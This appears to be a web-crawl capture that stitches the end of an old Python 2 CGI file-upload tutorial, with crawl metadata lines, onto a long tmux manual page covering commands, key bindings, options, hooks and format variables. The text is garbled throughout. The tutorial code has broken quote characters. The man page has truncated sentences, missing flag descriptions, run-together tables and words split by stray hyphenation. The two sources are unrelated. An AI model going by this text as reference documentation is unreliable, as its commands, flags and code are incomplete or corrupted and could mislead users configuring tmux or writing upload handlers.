#Loop over any available file types and check if the file being
# uploaded is the right format. Checks if the file already exists
if path.endswith(each) and not os.path.isfile(path):
file(path, ‘wb’).write(str(form[name].value))
#Return True to indicate the file was uploaded successfully.
return True
if __name__ == ‘__main__':
form = cgi.FieldStorage()
print ‘Content-Type: text/htmln’
if uploads(form, ‘upload’, ”, ‘.txt’, ‘.zip’):
#If the upload was successful then print a message.
print ‘Finished uploading file…’
else:
print ‘Failed to upload file. Please visit our help center at…’
If you want to give this a go, you’ll need a form set up for file upload; something like this one…
<form name=”upload” method=”POST” action=”upload.py” enctype=”multipart/form-data”>
<input name=”upload” type=”file” /><input type=”submit” name=”submit” />
</form>
This is pretty small as functions go, but there’s quite a lot going on right from the beginning!
As in our other examples, this starts by importing the modules we need into the programs global namespace. Unlike these examples, our next line redirects errors to standard output; this simply sends error messages, as you would get from Python normally to the web browser instead of the error log.
If you’re going to use Python for CGI, then you should definitely take a look at the ‘cgitb’ module at
{mospagebreak title=Inside uploads()… }
We first need to make sure that the field ‘name’ provided is in our ‘form’. As long as it is then we get the path (as it appeared in the file field) of the file we want to upload and get the files name using os.path.basename(). We then join it to the ‘path’ using the os.path.join() function… this lets us to upload files to different places and keep the original filename.
Next we loop over the available file types in ‘args’ and check the files extension against each type. If the file is a valid type, then we make sure the file doesn’t already exists (files won’t be uploaded if the file exists to prevent overwriting) before writing the file to the server.
As in the limits() example uploads() can be used with an if statement to check if the function was successful or not. Or even use it with limits() so the user can only upload a set number of files per day.
Ok, by now you should have a fair idea of what exactly writing web applications with python is about and why you would want to, as well as have some idea of what’s possible… but this is only the tip of the iceberg!
Hope you’ve had fun. If you want to learn more about Python or the subjects covered here, then start clicking: – Python
homepage – Python tutorial – Python Documentation online! – Apache homepage – Apache Documentation – mod_python homepage! – Zope homepage! – Spyce [Python Server Pages] homepage!
Note: All the sample programs shown and discussed in this article were tested on Windows XP running Python 2.3 under Apache 1.3. Upload script was tested on remote Linux server.
|
http://www.devshed.com/c/a/python/python-on-the-web/5/
|
CC-MAIN-2014-42
|
refinedweb
| 2,277
| 62.78
|
tmux - terminal multiplexer
tmux [-2CluvV] [-c shell-command] [-f file] [-L socket-name] [-S socket-path] [command [flags]]
TMUX(1) BSD Write UTF-8 output to the terminal even if the first envi- ronment variable of LC_ALL, LC_CTYPE, or LANG that is set does not contain "UTF-8" or "UTF8". generated with a copy of every- thing tmux writes to the terminal. The SIGUSR2 signal may be sent to the tmux server process to toggle logging between on (as if -v was given) and off. -V Report the tmux version. command [flags] This specifies one of a set of commands used to control tmux, as described in the following sections. If no com- mands are specified, the new-session command is assumed. DEFAULT. m Mark the current pane (see select-pane -m). M Clear the marked pane. n Change to the next window. o Select the next pane in the current window. p Change to the previous window. q Briefly display pane indexes. r Force redraw of the attached client.. COMMAND PARSING AND EXECUTION tmux supports a large number of commands which can be used to control its behaviour. Each command is named and can accept zero or more flags and arguments. They may be bound to a key with the bind-key command or run from the shell prompt, a shell script, a configuration file or the com- mand prompt. For example, the same set-option command run from the shell prompt, from ~/.tmux.conf and bound to a key may look like: $ tmux set-option -g status-style bg=cyan set-option -g status-style bg=cyan bind-key C set-option -g status-style bg=cyan Here, the command name is `set-option', `-g' is a flag and `status-style' and `bg=cyan' are arguments. tmux distinguishes between command parsing and execution. In order to execute a command, tmux needs it to be split up into its name and argu- ments. This is command parsing. If a command is run from the shell, the shell parses it; from inside tmux or from a configuration file, tmux does. Examples of when tmux parses commands are: - in a configuration file; - typed at the command prompt (see command-prompt); - given to bind-key; - passed as arguments to if-shell or confirm-before. To execute commands, each client has a `command queue'. A global command queue not attached to any client is used on startup for configuration files like ~/.tmux.conf. Parsed commands added to the queue are executed in order. Some commands, like if-shell and confirm-before, parse their argument to create a new command which is inserted immediately after themselves. This means that arguments can be parsed twice or more - once when the parent command (such as if-shell) is parsed and again when it parses and executes its command. Commands like if-shell, run-shell and display-panes stop execution of subsequent commands on the queue until something happens - if-shell and run-shell until a shell command finishes and display-panes until a key is pressed. For example, the following commands: new-session; new-window if-shell "true" "split-window" kill-session Will execute new-session, new-window, if-shell, the shell command true(1), split-window and kill-session in that order. The COMMANDS section lists the tmux commands and their arguments. PARSING SYNTAX This section describes the syntax of commands parsed by tmux, for example in a configuration file or at the command prompt. Note that when com- mands are entered into the shell, they are parsed by the shell - see for example ksh(1) or csh(1). Each command is terminated by a newline or a semicolon (;). Commands separated by semicolons together form a `command sequence' - if a command in the sequence encounters an error, no subsequent commands are executed. Comments are marked by the unquoted # character - any remaining text after a comment is ignored until the end of the line. If the last character of a line is \, the line is joined with the follow- ing line (the \ and the newline are completely removed). This is called line continuation and applies both inside and outside quoted strings and in comments, but not inside braces. Command arguments may be specified as strings surrounded by single (') quotes, double quotes (") or braces ({}). This is required when the argument contains any special character. Single and double quoted strings cannot span multiple lines except with line continuation. Braces can span multiple lines. Outside of quotes and inside double quotes, these replacements are per- formed: - Environment variables preceded by $ are replaced with their value from the global environment (see the GLOBAL AND SESSION ENVIRONMENT section). - A leading ~ or ~user is expanded to the home directory of the current or specified user. - \uXXXX or \uXXXXXXXX is replaced by the Unicode codepoint cor- responding to the given four or eight digit hexadecimal number. - When preceded (escaped) by a \, the following characters are replaced: \e by the escape character; \r by a carriage return; \n by a newline; and \t by a tab. - \ooo is replaced by a character of the octal value ooo. Three octal digits are required, for example \001. The largest valid character is \377. - Any other characters preceded by \ are replaced by themselves (that is, the \ is removed) and are not treated as having any special meaning - so for example \; will not mark a command sequence and \$ will not expand an environment variable. Braces are similar to single quotes in that the text inside is taken lit- erally without any replacements but this also includes line continuation. Braces can span multiple lines in which case a literal newline is included in the string. They are designed to avoid the need for addi- tional escaping when passing a group of tmux or shell commands as an argument (for example to if-shell or pipe-pane). These two examples pro- duce an identical command - note that no escaping is needed when using {}: if-shell true { display -p 'brace-dollar-foo: }$foo' } if-shell true "\n display -p 'brace-dollar-foo: }\$foo'\n" Braces may be enclosed inside braces, for example: bind x if-shell "true" { if-shell "true" { display "true!" } } Environment variables may be set by using the syntax `name=value', for example `HOME=/home/user'. Variables set during parsing are added to the global environment. Commands may be parsed conditionally by surrounding them with `%if', `%elif', `%else' and `%endif'. The argument to `%if' and `%elif' is expanded as a format (see FORMATS) and if it evaluates to false (zero or empty), subsequent text is ignored until the closing ` `myhost', green if run- ning on `myotherhost', or blue if running on another host. Conditionals may be given on one line, for example: %if #{==:#{host},myhost} set -g status-style bg=red %endif COMMANDS This section describes the commands supported by tmux. Most commands accept the optional -t , accepted entirely of the token `{mouse}' (alternative form `=') to specify the session, window or pane where the most recent mouse event occurred (see the MOUSE SUPPORT section) or `{marked}' (alternative form `~') to spec- ify using arguments and executed directly (without `sh -c'). This can avoid issues with shell quoting. For example: $ tmux new-window vi /etc/passwd Will run vi(1) directly without invoking the shell. command [arguments] refers to a tmux command, either passed with the com- mand and arguments separately, for example: bind-key F1 set-option status off Or passed as a single string argument in .tmux.conf, for example: bind-key F1 { set-option status off } Example tmux commands include: refresh-client -t/dev/ttyp2 rename-session -tfirst newname set-option -wtx] [. If -x is given, send SIGHUP to the parent process of the client as well as detaching the client, typically causing it to exit. ] [-E shell-command] [. With -E, run shell-command to replace the client.] [command] (alias: lscm) List the syntax of command or - if omitted - of all commands sup- portedX] [ comes from the global default-size option; -x and -y can be used to specify a different size. `-' uses the size of the cur- rent client if any. If -x or -y is given, the default-size option is set for the session. If run from a terminal, any termios(4) special characters are saved and used for new windows in the new session. The -A flag makes new-session behave like attach-session if session-name already exists; in this case, -D behaves like -d to attach-session, and -X behaves like -x argument may be: 1. the name of an existing group, in which case the new ses- sion is added to that group; 2. the name of an existing session - the new session is added to the same group as that session, creating a new group if necessary; 3. the name for a new group containing only the new session. [-cDlLRSU] [-C XxY] [-F flags] [-t target-client] [adjustment] (alias: refresh) Refresh the current client if bound to a key, or a single client if one is given with -t. If -S is specified, only update the client's status line. The -U, -D, -L -R, and -c flags allow the visible portion of a window which is larger than the client to be changed. -U moves the visible part up by adjustment rows and -D down, -L left by adjustment columns and -R right. -c returns to tracking the cur- sor automatically. If adjustment is omitted, 1 is used. Note that the visible position is a property of the client not of the window, changing the current window in the attached session will reset it. -C sets the width and height of a control client and -F sets a comma-separated list of flags. Currently the only flag available is `no-output' to disable receiving pane output. -l requests the clipboard from the client using the xterm(1) escape sequence and stores it in a new paste buffer. -L, -R, -U and -D move the visible portion of the window left, right, up or down by adjustment, if the window is larger than the client. -c resets so that the position follows the cursor. See the window-size option. option. With -t, display the log for target-client. -J and -T show debugging information about jobs and terminals. source-file [-nqv] path ... (alias: source) Execute commands from one or more files specified by path (which may be glob(7) patterns). If -q is given, no error will be returned if path does not exist. With -n, the file is parsed but no commands are executed. -v shows the parsed commands and line numbers if possible. start-server (alias: start) Start the tmux server, if not already running, without creating any sessions. Note that as by default the tmux server will exit with no ses- sions, this is only useful if a session is created in ~/.tmux.conf, exit-empty is turned off, or another command is run as part of the same command sequence. For example: $ tmux start \; show -g suspend-client [-t target-client] (alias: suspendc) Suspend a client by sending SIGTSTP (tty stop). switch-client [-ElnprZ] [-c target-client] [-t target-session] [-T key-table] (alias: switchc) Switch the current session for client target-client to target-session. As a special case, -t may refer to a pane (a target that contains `:', `.' or `%'), to change session, window and pane. In that case, -Z keeps the window zoomed if it was zoomed.. By default, a tmux pane permits direct access to the terminal contained in the pane. A pane may also be put into one of several modes: - Copy mode, which permits a section of a window or its history to be copied to a paste buffer for later insertion into another window. This mode is entered with the copy-mode command, bound to `[' by default. - View mode, which is like copy mode but is entered when a com- mand that produces output, such as list-keys, is executed from a key binding. - Choose mode, which allows an item to be chosen from a list. This may be a client, a session or window or pane, or a buffer. This mode is entered with the choose-buffer, choose-client and choose-tree commands. In copy mode an indicator is displayed in the top-right corner of the pane with the current position and the number of lines in the history. Commands are sent to copy mode using the -X flag to the send-keys com- mand. When a key is pressed, copy mode automatically uses one of two key tables, depending on the mode-keys option: copy-mode for emacs, or copy-mode-vi for vi. Key tables may be viewed with the list-keys com- mand. The following commands are supported in copy mode: Command vi emacs append-selection append-selection-and-cancel A back-to-indentation ^ M-m begin-selection Space C-Space bottom-line L cancel q Escape clear-selection Escape C-g copy-end-of-line [<prefix>] D C-k copy-line [<prefix>] copy-pipe <command> [<prefix>] copy-pipe-no-clear <command> [<prefix>] copy-pipe-and-cancel <command> [<prefix>] copy-selection [<prefix>] copy-selection-no-clear [<prefix>] copy-selection-and-cancel [<prefix>] Enter M-w cursor-down j Down cursor-down-and-cancel-matching-bracket % M-C-f next-paragraph } M-} next-space W next-space-end E next-word w next-word-end e M-f other-end o page-down C-f PageDown page-down-and-cancel page-up C-b PageUp previous-matching-bracket M-C-b previous-paragraph { M-{ previous-space B previous-word b M-b rectangle-toggle v R scroll-down C-e C-Down scroll-down-and-cancel scroll-up C-y C-Up search-again n n search-backward <for> ? search-backward-incremental <for> C-r search-backward-text <for> search-forward <for> / search-forward-incremental <for> C-s search-forward-text <for> search-reverse N N select-line V select-word start-of-line 0 C-a stop-selection top-line H M-R The search commands come in several varieties: `search-forward' and `search-backward' search for a regular expression; the `-text' variants search for a plain text string rather than a regular expression; `-incremental' perform an incremental search and expect to be used with the -i flag to the command-prompt command. `search-again' repeats the last search and `search-reverse' does the same but reverses the direction (forward becomes backward and backward becomes forward). Copy commands may take an optional buffer prefix argument which is used to generate the buffer name (the default is `buffer' so buffers are named `buffer0', `buffer1' and so on). Pipe commands take a command argument which is the command to which the copied text is piped. The `-and-cancel' variants of some commands exit copy mode after they have completed (for copy commands) or when the cursor reaches the bottom (for scrolling commands). `-no-clear' variants do not clear the selection.: copy-mode [-eHMqu] [-t target-pane] Enter copy mode. The -u option scrolls one page up. -M begins a mouse drag (only valid if bound to a mouse key binding, see MOUSE SUPPORT). -H hides the position indicator in the top right. -q cancels copy mode and any other modes. A number of preset arrangements of panes are available, these are called layouts.] [-n window-name] [-s src-pane] [-t dst-window] CJ exists, an error will be returned unless -q is given. If -e is given, the output includes escape sequences for text and back- ground attributes. -C also escapes non-printable characters as octal \xxx. -N preserves trailing spaces at each line's end and -J preserves trailing spaces and joins any wrapped lines. [-Nr field r Reverse sort order v Toggle preview q Exit mode After a client is chosen, `%%' is replaced by the client name in template and the result executed as a command. If template is not given, "detach-client -t '%%'" is used. -O specifies the initial sort field: one of `name', `size', `creation', or `activity'. -r reverses the sort order. -f spec- ifies an initial filter: the filter is a format - if it evaluates to zero, the item in the list is not shown, otherwise it is shown. If a filter would lead to an empty list, it is ignored. -F specifies the format for each item in the list. -N starts without the preview. This command works only if at least one client is attached. choose-tree [-GNrswZ] [-F format] [-f filter] [-O sort-order] [-t target-pane] [template] Put a pane into tree mode, where a session, window or pane may be chosen interactively from a list. -s starts with sessions col- lapsed and -w with windows collapsed. -Z zooms the pane. The following keys may be used in tree mode: Key Function Enter Choose selected item Up Select previous item Down Select next item x Kill selected item X Kill tagged items < field r Reverse sort order v Toggle preview q Exit mode After a session, window or pane is chosen, `%%' is replaced by the target in template and the result executed as a command. If template is not given, "switch-client -t '%%'" is used. -O specifies the initial sort field: one of `index', `name', or `time'. tree. -N starts without the preview. -G includes all sessions in any session groups in the tree rather than only the first. This command works only if at least one client is attached. display-panes [-b] [-d duration] [-t target-client] [template] (alias: displayp) Display a visible indicator of each pane shown by target-client. See the display-panes-colour and display-panes-active-colour ses- sion options. The indicator is closed when a key is pressed or duration milliseconds have passed. If -d is not given, display-panes-time is used. A duration of zero means the indica- tor stays until a key is pressed. While the indicator is on screen, a pane may be chosen with the `0' to `9' keys, which will cause template to be executed as a command with `%%' substituted by the pane ID. The default template is "select-pane -t '%%'". With -b, other commands are not blocked from running until the indicator is closed. find-window [-rCNTZ] [-t target-pane] match-string (alias: findw) Search for a fnmatch(3) pattern or, with -r, regular expression match-string in window names, titles, and visible content (but not history). The flags control matching behavior: -C matches only visible window contents, -N matches only the window name and -T matches only the window title. The default is -CNT. -Z zooms the pane. This command works only if at least one client is attached. join-pane [-bdfhv] [-l size] [Z] [-t target-window] (alias: lastp) Select the last (previously selected) pane. -Z keeps the window zoomed if it was zoomed. ] [-e environment] [. -e takes the form `VARIABLE=value' and sets an environment vari- able for the newly created window; it may be specified multiple times. The TERM environment variable must be set to `screen' or `tmux' for all programs running inside tmux. New windows will automati- cally have `TERM=screen' added to their environment, but care must be taken not to reset this in shell start-up files or by the -e option. [-IOo] [-t target-pane] [shell-command] (alias: pipep) Pipe output sent by the program in target-pane to a shell command or vice versa. A pane may only be connected to one command at a time, any existing pipe is closed before shell-command is exe- cuted. The shell-command string may contain the special charac- ter. columns (the default is 1); -x and -y may be a given as a number of lines or columns or followed by `%' for a percentage of the window size (for example `-x 10%'). With -Z, the active pane is toggled between zoomed (occupying the whole of the window) and unzoomed (its normal position in the layout). -M begins mouse resizing (only valid if bound to a mouse key binding, see MOUSE SUPPORT). resize-window [-aADLRU] [-t target-window] [-x width] [-y height] [adjustment] (alias: resizew) Resize a window, up, down, left or right by adjustment with -U, -D, -L or -R, or to an absolute size with -x or -y. The adjustment is given in lines or cells (the default is 1). -A sets the size of the largest session containing the window; -a the size of the smallest. This command will automatically set window-size to manual in the window options. respawn-pane [-k] [-c start-directory] [-e environment] [. -c specifies a new working directory for the pane. The -e option has the same meaning as for the new-window command. respawn-window [-k] [-c start-directory] [-e environment] [. -c specifies a new working directory for the window. The -e option has the same meaning as for the new-window command. rotate-window [-DUZ] [-t target-window] (alias: rotatew) Rotate the positions of the panes within a window, either upward (numerically lower) with -U or downward (numerically higher). -Z keeps the window zoomed if it was zoomed. select-layout [-Enop] [-t target-pane] ). -E spreads the current pane and any panes next to it out evenly. select-pane [-DdeLlMmRUZ] [-T title] [-t target-pane] (alias: selectp) Make pane target-pane the active pane in window target-window. If one of -D, -L, -R, or -U is used, respectively the pane below, to the left, to the right, or above the target pane is used. -Z keeps the window zoomed if it was zoomed. -l is the same as using the last-pane command. -e enables or -d disables input to the pane. -T sets the pane title. -m and -M are used to set and clear the marked pane. There is one marked pane at a time, setting a new marked pane clears the last. The marked pane is the default target for -s to join-pane, swap-pane and swap-window.dfhIvP] [-c start-directory] [-e environment] [-l size] [-t target-pane] [shell-command] [-F format] (alias: splitw) Create a new pane by splitting target-pane: -h does a horizontal split and -v a vertical split; if neither is specified, -v is assumed. The -l option specifies the size of the new pane in lines (for vertical split) or in columns (for horizontal split); size may be followed by `%' to specify a percentage of the avail- able space. The -b option causes the new pane to be created to the left of or above target-pane. The -f option creates a new pane spanning the full window height (with -h) or full window width (with -v), instead of splitting the active pane. An empty shell-command ('') will create a pane with no command running in it. Output can be sent to such a pane with the display-message command. The -I flag (if shell-command is not specified or empty) will create an empty pane and forward any output from stdin to it. For example: $ make 2>&1|tmux splitw -dI & All other options have the same meaning as for the new-window command. swap-pane [-dDUZ] [ and -Z keeps the window zoomed if it was zoomed.. If -d is given, the new window does not become the current window. A command bound to the Any key will execute for all keys which do not have a more specific binding. Commands related to key bindings are as follows: bind-key [-nr] [-N note] [-T key-table] key command [arguments] (alias: bind) Bind key key to command. Keys are bound in a key table. By default (without -T), the key is bound in the prefix key table. This table is used for keys pressed after the prefix key (for example, by default `c' is bound to new-window in the prefix ta- ble, com- mand used to switch to them from a key binding. The -r flag indicates this key may repeat, see the repeat-time option. -N attaches a note to the key (shown with list-keys -N). To view the default bindings and possible commands, see the list-keys command. list-keys [-1aN] [-P prefix-string -T key-table] [key] (alias: lsk) List key bindings. There are two forms: the default lists keys as bind-key commands; -N lists only keys with attached notes and shows only the key and note for each key. With the default form, all key tables are listed by default. -T lists only keys in key-table. With the -N form, only keys in the root and prefix key tables are listed by default; -T also lists only keys in key-table. -P specifies a prefix to print before each key and -1 lists only the first matching key. -a lists the command for keys that do have a note rather than skipping them. send-keys [-FHlMRX] [-N repeat-count] [ -l flag disables key name lookup and processes the keys as literal UTF-8 characters. The -H flag expects each key to be a hexadecimal number for an ASCII character. and -F expands for- mats in arguments where appropriate. various options. There are four types of option: server options, session options window options and pane options. The tmux server has a set of global server options which do not apply to any particular window or session or pane. a set of pane options to each pane. Pane options inherit from window options. This means any pane option may be set as a window option to apply the option to all panes in the window without the option set, for example these commands will set the background colour. tmux also supports user options which are prefixed with a `@'. User options may have any name, so long as they are prefixed with `@', and be set to any string. For example: $ tmux setw -q @foo "abc123" $ tmux showw -v @foo abc123 Commands which set options are as follows: set-option [-aFgopqsuw] [-t target-pane] option value (alias: set) Set a pane option with -p, a window option with -w, a server option with -s, otherwise a session option. If the option is not a user option, -w or -s may be unnecessary - tmux will infer the type from the option name, assuming -w for pane options. If -g is given, the global session or window option is set. -F expands formats in the option value.. show-options [-AgHpqsvw] [-t target-pane] [option] (alias: show) Show the pane options (or a single option if option is provided) with -p, the window options with -w, the server options with -s, otherwise the session options. If the option is not a user option, -w or -s may be unnecessary - tmux will infer the type from the option name, assuming -w for pane options. Global ses- sion or window options are listed if -g is used. -v shows only the option value, not the name. If -q is set, no error will be returned if option is unset. -H includes hooks (omitted by default). -A includes options inherited from a parent set of options, such options are marked with an asterisk. value depends on the option and may be a number, a string, or a flag (on, off, or omitted to toggle). Available server options are: backspace key Set the key sent by tmux for backspace. buffer-limit number Set the number of buffers; as new buffers are added to the top of the stack, old ones are removed from the bottom if necessary to maintain this maximum length. command-alias[] name=value This is an array of custom aliases for commands. If an unknown command `screen', `tmux' or a de- rivative his- tory on exit and load it from on start. message-limit number Set the number of error or information messages to save in the message log for each client. The default is 100. set-clipboard [on | external | off] Attempt to set the terminal clipboard content using the xterm(1) escape sequence, if there is an Ms entry in the terminfo(5) description overrid- den. Each entry is a colon-separated string made up of a termi- nal type pattern (matched using fnmatch(3)) and a set of name=value entries. For example, to set the `clear' terminfo(5) entry to `\e[H\e[2J' for all terminal types matching `rxvt*': rxvt*:clear=\e[H\e[2J The terminal entry value is passed through strunvis(3) before interpretation. user-keys[] key Set list of user-defined key escape sequences. Each item is associated with a key named `User0', `User1', and so on. For example: set -s user-keys[0] "\e[5;30012~" bind User0 resize-pane -L 3 win- dows bind- ings are not processed. The default is one millisecond and zero disables. base-index index Set the base index from which an unused index should be searched when a new window is created. The default is zero. bell-action [any | none | current | other] Set action on a bell in a window when monitor-bell is on. The values are the same as those for activity-action. default-command shell-command Set the command used for new windows (if not specified when the window is created) to shell-command, which may be any sh(1) com- mand. envi- ronment variable, the shell returned by getpwuid(3), or /bin/sh. This option should be configured when tmux is used as a login shell. default-size XxY Set the default size of new windows when the window-size option is set to manual or when a session is created with new-session -d. The value is the width and height separated by an `x' char- acter. The default is 80x24. mil- liseconds. history-limit lines Set the maximum number of lines held in window history. This setting applies only to new windows - existing window histories are not resized and retain the limit at the point they were cre- ated.. For how to specify style, see the STYLES section. message-style style Set status line message style. For how to specify style, see the STYLES section. mouse [on | off] If on, tmux captures the mouse and allows mouse events to be bound as key bindings. See the MOUSE SUPPORT section for details. prefix key Set the key accepted as a prefix key. In addition to the stan- dard, automatically renum- ber the other windows in numerical order. This respects the base-index option if it has been set. If off, do not renumber the windows. repeat-time time Allow multiple commands to be entered without pressing the pre- fix-key again in the specified time milliseconds (the default is 500). Whether a key repeats may be set when it is bound using the -r flag to bind-key. Repeat is enabled for the default keys bound to the resize-pane command. client terminal title if set-titles is on. Formats are expanded, see the FORMATS section. silence-action [any | none | current | other] Set action on window silence when monitor-silence is on. The values are the same as those for activity-action. status [off | on | 2 | 3 | 4 | 5] Show or hide the status line or specify its size. Using on gives a status line one row in height; 2, 3, 4 or 5 more rows. status-format[] format Specify the format to be used for each line of the status line. The default builds the top status line from the various individ- ual status options below. status-interval interval Update the status line exam- ple at the command prompt. The default is emacs, unless the VISUAL or EDITOR environment variables are set and contain the string `vi'. status-left string Display string (by default the session name) to the left of the status line. string will be passed through strftime(3). Also see the FORMATS and STYLES sections. status line. The default is 10. status-left-style style Set the style of the left part of the status line. For how to specify style, see the STYLES section. STYLES section. status-style style Set status line style. For how to specify style, see the STYLES section. update-environment[] variable Set list of environment variables to be copied into the session environment when a new session is created or an existing session is attached. Any variables that do not exist in the source envi- ronment are set to be removed from the session environment (as if -r was given to the set-environment command). inter- val ` -_@'. Available window options are: aggressive-resize [on | off] Aggressively resize the chosen window. This means that tmux will resize the window to the size of the smallest or largest session (see the window-size option) for which it is the current window, rather than the session to which it is attached. The window may resize when the current window is changed on another session; this option is good for full-screen programs which support SIGWINCH and poor for interactive programs such as shells. automatic-rename [on | off] Control automatic window renaming. When this setting is enabled, tmux will rename the window automatically using the format speci- fied by automatic-rename-format. This flag is automatically dis- abled for an individual window when a name is specified at cre- ation with new-window or new-session, or later with rename-window, or with a terminal escape sequence. It may be switched off globally with: set-option -wg automatic-rename off automatic-rename-format format The format (see FORMATS) used when the automatic-rename option is enabled. clock-mode-colour colour Set clock colour. clock-mode-style [12 | 24] Set clock hour format. main-pane-height height main-pane-width width Set the width or height of the main (left or top) pane in the main-horizontal or main-vertical layouts. mode-keys [vi | emacs] Use vi or emacs-style key bindings in copy mode. The default is emacs, unless VISUAL or EDITOR contains `vi'. mode-style style Set window modes style. For how to specify style, see the STYLES section. monitor-activity [on | off] Monitor for activity in the window. Windows with activity are highlighted in the status line. monitor-bell [on | off] Monitor for a bell in the window. Windows with a bell are high- lighted STYLES section. Attributes are ignored. pane-base-index index Like base-index, but set the starting index for pane numbers. STYLES section. Attributes are ignored. synchronize-panes [on | off] Duplicate input to any pane to all other panes in the same window (only for panes that are not in any special mode). window-status-activity-style style Set status line style for windows with an activity alert. For how to specify style, see the STYLES section. window-status-bell-style style Set status line style for windows with a bell alert. For how to specify style, see the STYLES section. window-status-current-format string Like window-status-format, but is the format used when the window is the current window. window-status-current-style style Set status line style for the currently active window. For how to specify style, see the STYLES section. window-status-format string Set the format in which the window is displayed in the status line window list. See the FORMATS and STYLES sections. window-status-last-style style Set status line style for the last active window. For how to specify style, see the STYLES section. window-status-separator string Sets the separator drawn between windows in the status line. The default is a single space character. window-status-style style Set status line style for a single window. For how to specify style, see the STYLES section. window-size largest | smallest | manual | latest Configure how tmux determines the window size. If set to largest, the size of the largest attached session is used; if smallest, the size of the smallest. If manual, the size of a new window is set from the default-size option and windows are resized automatically. With latest, tmux uses the size of the client that had the most recent activity. See also the resize-window command and the aggressive-resize option. wrap-search [on | off] If this option is set, searches will wrap around the end of the pane contents. The default is on. xterm-keys [on | off] If this option is set, tmux will generate xterm(1) -style func- tion key sequences; these have a number included to indicate mod- ifiers such as Shift, Alt or Ctrl. Available pane options are: allow-rename [on | off] Allow programs in the pane to change the window name using a ter- minal escape sequence (\ek...\e\\). alternate-screen [on | off] This option configures whether programs running inside the pane. remain-on-exit [on | off] A pane with this flag set is not destroyed when the program run- ning in it exits. The pane may be reactivated with the respawn-pane command. window-active-style style Set the pane style when it is the active pane. For how to spec- ify style, see the STYLES section. window-style style Set the pane style. For how to specify style, see the STYLES section. HOOKS tmux allows commands to run on various triggers, called hooks. Most tmux commands have an after hook and there are a number of hooks not associ- ated with commands. Hooks are stored as array options, members of the array are executed in order when the hook is triggered. Hooks may be configured with the set-hook or set-option commands and displayed with show-hooks or show-options -H. The following two commands are equivalent: set-hook -g pane-mode-changed[42] 'set -g status-left-style bg=red' set-option -g pane-mode-changed[42] 'set -g status-left-style bg=red' Setting a hook without specifying an array index clears the hook and sets the first member of the array. A command's after hook is run after it completes, except when the command is run as part of a hook itself. They are named with an `after-' prefix. For example, the following command adds a hook to select the even-verti- cal layout after every split-window: set-hook -g after-split-window "selectl even-vertical" All the notifications listed in the CONTROL MODE section are hooks (with- out-focus-in Run when the focus enters a pane, if the focus-events option is on. pane-focus-out Run when the focus exits a pane, if the focus-events option is on. [-agRu] [-t target-session] hook-name command Without -R, sets (or with -u unsets) hook hook-name to command. If -g is given, hook-name is added to the global list of hooks, otherwise it is added to the session hooks (for target-session with -t). -a appends to a hook. Like options, session hooks inherit from the global ones. With -R, run hook-name the following: Pane the contents of a pane Border a pane border Status the status line window list StatusLeft the left part of the status line StatusRight the right part of the status line StatusDefault any other part. Format variables are enclosed in `#{' and `}', for example `#{session_name}'. The possi- ble variables are listed in the table below, or the name of a tmux option may be used for an option's value. Some variables have a shorter alias such as `#S'; `##' is replaced by a single `#', `#,' by a `,' and `#}' by a `}'. Conditionals are available include `yes' if automatic-rename is enabled, or `no' if not. Condition- als can be nested arbitrarily. Inside a conditional, `,' and `}' must be escaped as `#,' and `#}', unless they are part of a `#{...}' replacement. For example: #{?pane_in_mode,#[fg=white#,bg=red],#[fg=red#,bg=white]}#W . String comparisons may be expressed by prefixing two comma-separated alternatives by `==', `!=', `<', `>', `<=' or `>=' and a colon. For example `#{==:#{host},myhost}' will be replaced by `1' if running on `myhost', otherwise by `0'. `||' and `&&' evaluate to true if either or both of two comma-separated alternatives are true, for example `#{||:#{pane_in_mode},#{alternate_on}}'. An `m' specifies an fnmatch(3) or regular expression comparison. The first argument is the pattern and the second the string to compare. An optional third argument specifies flags: `r' means the pattern is a regu- lar expression instead of the default fnmatch(3) pattern, and `i' means to ignore case. For example: `#{m:*foo*,#{host}}' or `#{m/ri:^A,MYVAR}'. A `C' performs a search for an fnmatch(3) pattern or regular expression in the pane content and evaluates to zero if not found, or a line number if found. Like `m', an `r' flag means search for a regular expression and `i' ignores case. For example: `#{C/r:^Start}' A limit may be placed on the length of the resultant string by prefixing it by an `=', a number and a colon. Positive numbers count from the start of the string and negative from the end, so `#{=5:pane_title}' will include at most the first five characters of the pane title, or `#{=-5:pane_title}' the last five characters. A suffix or prefix may be given as a second argument - if provided then it is appended or prepended to the string if the length has been trimmed, for example `#{=/5/...:pane_title}' will append `...' if the pane title is more than five characters. Similarly, `p' pads the string to a given width, for example `#{p10:pane_title}' will result in a width of at least 10 charac- ters. A positive width pads on the left, a negative on the right.. `q:' will escape sh(1) spe- cial characters. `E:' will expand the format twice, for example `#{E:status-left}' is the result of expanding the content of the status-left option rather than the option itself. `T:' is like `E:' but also expands strftime(3) specifiers. `S:', `W:' or `P:' will loop over each session, window or pane and insert the format once for each. For windows and panes, two comma-separated formats may be given: the second is used for the current window or active pane. For example, to get a list of windows formatted like the status line: #{W:#{E:window-status-format} ,#{E:window-status-current-format} } A prefix of the form `s/foo/bar/:' will substitute `foo' with `bar' throughout. The first argument may be an extended regular expression and a final argument may be `i' to ignore case, for example `s/a(.)/\1x/i:' would change `abABab' into `bxBxbx'. In addition, the last. If the command hasn't exited, the most recent line of output will be used, but the sta- tus line will not be updated more than once a second. Commands are exe- cuted with the tmux global environment set (see the GLOBAL AND SESSION ENVIRONMENT section). An `l' specifies that a string should be interpreted literally and not expanded. For example `#{l:#{?pane_in_mode,yes,no}}' will be replaced by `#{?pane_in_mode,yes,no}'. The following variables are available, where appropriate: Variable name Alias Replaced with alternate_on_cell_height Height of each client cell in pixels client_cell_width Width of each client cell in pixels client_control_mode 1 if client is in control mode client_created Time client created client_discarded Bytes discarded when client behind client_height Height of client client_key_table Current key table client_last_session Name of the client's last session client_name Name of client-8 client_width Width of client client_written Bytes written to client command Name of command in use, if any command_list_alias Command alias if listing commands command_list_name Command name if listing commands command_list_usage Command usage if listing commands copy_cursor_line Line the cursor is on in copy mode copy_cursor_word Word under cursor in copy mode copy_cursor_x Cursor X position in copy mode copy_cursor_y Cursor Y position in copy mode cursor_character Character at cursor in pane host #H Hostname of local host host_short #h Hostname of local host (no domain name) insert_flag Pane insert flag keypad_cursor_flag Pane keypad cursor flag keypad_flag Pane keypad flag line Line number in the list mouse_all_flag Pane mouse all flag mouse_any_flag Pane mouse any flag mouse_button_flag Pane mouse button flag mouse_line Line under mouse, if any mouse_sgr_flag Pane mouse SGR flag mouse_standard_flag Pane mouse standard flag mouse_utf8_flag Pane mouse UTF-8 flag mouse_word Word under mouse, if any mouse_x Mouse X position, if any mouse_y Mouse Y position, if any 